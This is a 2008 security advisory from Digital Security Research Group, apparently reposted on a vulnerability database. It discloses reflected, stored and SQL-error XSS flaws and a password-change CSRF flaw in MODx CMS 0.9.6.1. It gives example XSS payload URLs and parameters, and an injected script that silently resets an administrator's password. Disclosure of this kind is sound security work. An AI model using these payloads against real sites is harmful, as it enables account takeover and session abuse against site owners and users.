[DSECRG-08-013] Modx 0.9.6.1, 0.9.6.1p1 Multiple Security Vulnerabilities

2008-02-07T00:00:00
ID SECURITYVULNS:DOC:19029
Type securityvulns
Reporter Securityvulns
Modified 2008-02-07T00:00:00

Description

Digital Security Research Group [DSecRG] Advisory #DSECRG-08-013

Application: MODx CMS Versions Affected: 0.9.6.1, 0.9.6.1p1 Vendor URL: http://modxcms.com/ Bugs: XSS, SiXSS, stored XSS, Change User Password XSRF Vulnerability. Exploits: YES Reported: 11.01.2008 Vendor response: 11.01.2008 Updated Report: 29.01.2008 Vendor response: none Solution: none Date of Public Advisory: 07.02.2008 Authors: Alexandr Polyakov, Stas Svistunovich Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)

Description


MODx system has multiple security vulnerabilities:

  1. Linked XSS
  2. Linked SiXSS
  3. XSS in POST
  4. Stored XSS in POST
  5. Change User Password XSRF Vulnerability

Details


  1. Multiple linked XSS vulnerabilities found. Attacker can inject XSS in URL string.

1.1 Linked XSS vulnerability found in manager/index.php. GET parameter "search"

Search string is available in pages:

http://[server]/[installdir]/manager/index.php?a=75

http://[server]/[installdir]/manager/index.php?a=84

http://[server]/[installdir]/manager/index.php?a=99

http://[server]/[installdir]/manager/index.php?a=106

http://[server]/[installdir]/manager/index.php?a=114

Example:

http://[server]/[installdir]/manager/index.php?a=75&search="><IMG SRC="javascript:alert('DSecRG XSS')

http://[server]/[installdir]/manager/index.php?a=84&search="><IMG SRC="javascript:alert('DSecRG XSS')

1.2 Linked XSS vulnerability found in index.php. GET parameter "highlight"

Example:

http://[server]/[installdir]/index.php?searched=modx&highlight="><IMG SRC="javascript:alert('DSecRG XSS')


  1. Multiple linked SiXSS vulnerabilities found. Attacker can inject XSS code in SQL Error.

2.1 Vulnerability found in script manager/index.php. GET parameter "a"

Example:

http://[server]/[installdir]/manager/index.php?a='<img src="javascript:alert('DSecRG XSS')">

2.2 Vulnerability found in script index.php. GET parameter "id"

Example:

http://[server]/[installdir]/index.php?id='<img src="javascript:alert('DSecRG XSS')">


  1. XSS in POST, attacker can inject XSS in POST parameter

3.1 Vulnerability found in script index-ajax.php.

POST parameters "docgrp" and "moreResultsPage".

Example:

moreResultsPage = "><IMG SRC="javascript:alert('DSecRG XSS')">

3.2 Vulnerability found in script index.php.

POST parameters "email", "name" and "parent".

Example:

name = " style="background:url(javascript:alert('DSecRG XSS'))


  1. Vulnerability found in script manager/index.php?a=10

POST parameters "messagesubject" and "messagebody".

Attacker can comprose message with script code in subject and message body.


  1. Change User Password XSRF Vulnerability

Previous password not required to set a new password.

Using XSS vulnerabilities, attacker can include following code to change user password:


<IMG%20SRC=`javascript:var%20objHTTP%20=%20new%20ActiveXObject('MSXML2.XMLHTTP');%20objHTTP.open('POST',"http://[server]/[installdir]/manager/index.php?a=34",false);%20objHTTP.setRequestHeader('Content-Type',%20'application/x-www-form-urlencoded');%20objHTTP.send("pass1=123456%26pass2=123456");`>


About


Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website.

Contact: research [at] dsec [dot] ru http://www.dsec.ru (in Russian)